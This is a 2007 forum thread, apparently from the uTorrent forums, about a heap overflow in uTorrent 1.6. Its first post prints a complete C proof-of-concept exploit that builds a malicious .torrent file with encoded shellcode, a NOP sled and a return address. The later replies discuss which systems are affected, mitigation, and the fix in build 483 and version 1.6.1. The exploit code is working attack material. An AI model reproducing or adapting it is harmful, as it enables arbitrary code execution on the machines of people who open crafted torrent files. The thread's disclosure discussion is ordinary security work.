FLX Posted February 13, 2007 Report Share Posted February 13, 2007 /** This is a PoC remote exploit for uTorrent 1.6** Author:* defsec <defacedsecurity@hotmail.com>* http://www.defacedsecurity.com*** Works on XP SP1 and w2k sp1-4**/#include <stdio.h>#include <stdlib.h>#define NASIZE 4880unsigned char nice_announce[NASIZE];unsigned char xorops[]="\x33\xc0\x33\xdb";// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum// Restricted Character 0x00unsigned char shellcode[]="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49""\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36""\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34""\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41""\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34""\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47""\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48""\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58""\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c""\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e""\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38""\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54""\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48""\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53""\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37""\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a""\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b""\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53""\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37""\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49""\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46""\x4e\x46\x43\x46\x42\x30\x5a";//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4unsigned char jmptosc[] = "\xeb\x04\\xa7\x2c\xc2\x77\\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";int main(int argc,char *argv[]){ FILE * pFile; long lSize; char * buffer; size_t result; long i = 0; long j = 0; long lPtrIndex; long lHeadSize; long lTailSize; char * curptr; char * alptr; char * torrentTail; if (argc < 2) { printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]"); printf("\n\nUsage: "); printf("%s",argv[0]); printf(" <TorrentFile>\n"); return 0; } pFile = fopen (argv[1],"rb"); if (pFile==NULL) { fputs ("File error",stderr); return 0; } // obtain file size: fseek (pFile ,0,SEEK_END); lSize = ftell (pFile); rewind (pFile); // allocate memory to contain the whole file: buffer = (char*) malloc (sizeof(char)*lSize); if (buffer == NULL) { fputs ("Memory error",stderr); return 0; } // copy the file into the buffer: result = fread (buffer,1,lSize,pFile); if (result != lSize) { fputs ("Reading error",stderr); return 0; } fclose (pFile); /* find announce / announce-list and erase it */ alptr = (char *) strstr(buffer,"announce"); if (alptr == NULL) { printf("\ninvalid torrent file"); return 0; } curptr = (char *) strstr(alptr, "7:comment"); lHeadSize = curptr - buffer; lTailSize = lSize - lHeadSize; torrentTail = (char *) malloc (sizeof(char)*lTailSize); memcpy(torrentTail,curptr,lTailSize); /* generate offending header */ strcpy(nice_announce,"d8:announce4864:"); for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++) nice_announce[lPtrIndex] = 0x90; lPtrIndex = 84; memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1); lPtrIndex += sizeof(xorops) -1; memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1); for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++) nice_announce[lPtrIndex] = jmptosc[i]; /* get head and tail together into a file */ curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize)); for (i=0;i<NASIZE;i++) curptr[i] = nice_announce[i]; for (;i<(NASIZE+lTailSize);i++,j++) curptr[i] = torrentTail[j]; /* write to file and exit */ pFile = fopen ( "output.torrent" , "wb" ); if (pFile==NULL) { fputs ("File error",stderr); return 0; } fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile); fclose (pFile); return 1337; //:)}Just a heads up. Link to comment Share on other sites More sharing options...
Ultima Posted February 13, 2007 Report Share Posted February 13, 2007 Yah, previously reported on the IRC channel ;\Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so to prevent µTorrent from autoloading malicious .torrent files). Link to comment Share on other sites More sharing options...
Firon Posted February 13, 2007 Report Share Posted February 13, 2007 Does it allow for arbitrary code execution? Does this one work on XP SP2? Link to comment Share on other sites More sharing options...
Ultima Posted February 13, 2007 Report Share Posted February 13, 2007 "Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though. Link to comment Share on other sites More sharing options...
Greg Hazel Posted February 13, 2007 Report Share Posted February 13, 2007 This is an easy fix. Thanks for the report. Link to comment Share on other sites More sharing options...
FLX Posted February 13, 2007 Author Report Share Posted February 13, 2007 I already saw a arbitrary code execution and a local privilege escalation poc where im from. But this is the only one that has been made public. Said to be working on win2000, xp sp1 and xp sp2. Link to comment Share on other sites More sharing options...
alex14san Posted February 13, 2007 Report Share Posted February 13, 2007 is it fixed already in last beta (483)? Link to comment Share on other sites More sharing options...
Firon Posted February 13, 2007 Report Share Posted February 13, 2007 Yes, ludde fixed it months ago in 483.http://download.utorrent.com/beta/utorrent-1.6.1-beta-build-483.exe for those who don't have the link. Link to comment Share on other sites More sharing options...
Falcon4 Posted February 14, 2007 Report Share Posted February 14, 2007 It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page! Link to comment Share on other sites More sharing options...
Ultima Posted February 14, 2007 Report Share Posted February 14, 2007 Latest Version: µTorrent 1.6.1 Stable build 488Download: http://download.utorrent.com/1.6.1/utorrent.exeChangelog: http://download.utorrent.com/1.6.1/utorrent-1.6.1.txt Link to comment Share on other sites More sharing options...
Falcon4 Posted February 14, 2007 Report Share Posted February 14, 2007 I understand that. This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v Link to comment Share on other sites More sharing options...
Ultima Posted February 14, 2007 Report Share Posted February 14, 2007 Oh my post wasn't actually a response so much as it was an update I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something. Link to comment Share on other sites More sharing options...
Falcon4 Posted February 14, 2007 Report Share Posted February 14, 2007 I see... sorry But yeah... it's bugged me for a long time that the beta was never added to the download page Link to comment Share on other sites More sharing options...
Ultima Posted February 14, 2007 Report Share Posted February 14, 2007 Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up. Link to comment Share on other sites More sharing options...
Firon Posted February 14, 2007 Report Share Posted February 14, 2007 Most betas usually were, but b483 was intended to be with the webui only. Link to comment Share on other sites More sharing options...
Falcon4 Posted February 14, 2007 Report Share Posted February 14, 2007 I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno =) Link to comment Share on other sites More sharing options...
Firon Posted February 14, 2007 Report Share Posted February 14, 2007 1.6.1 already came out it'll be on the main page later Link to comment Share on other sites More sharing options...
Ultima Posted February 14, 2007 Report Share Posted February 14, 2007 I... did... sorta... post... a link... up above Link to comment Share on other sites More sharing options...
Falcon4 Posted February 14, 2007 Report Share Posted February 14, 2007 Wull yeah but. Link to comment Share on other sites More sharing options...
xerces8 Posted February 14, 2007 Report Share Posted February 14, 2007 1.6.1 is still not on the download page : http://www.utorrent.com/download.phpThere is also not a single word about the exploit on the front page. Link to comment Share on other sites More sharing options...
Game90 Posted February 14, 2007 Report Share Posted February 14, 2007 Firon said "Later" .... Link to comment Share on other sites More sharing options...
µtorrent-Guest Posted February 14, 2007 Report Share Posted February 14, 2007 Thank the new guy in charge for that delay!Bram CohenBitTorrent™ Inc.Edit: I talk about the downloadpage since yesterday! Link to comment Share on other sites More sharing options...
rseiler Posted February 14, 2007 Report Share Posted February 14, 2007 What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix? Link to comment Share on other sites More sharing options...
Firon Posted February 14, 2007 Report Share Posted February 14, 2007 beta 483 wasn't vulnerable to the issue and it was released last year. Ludde actually unintentionally fixed it when some stuff was rewritten, so it just wasn't known that there was an exploit in the first place. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.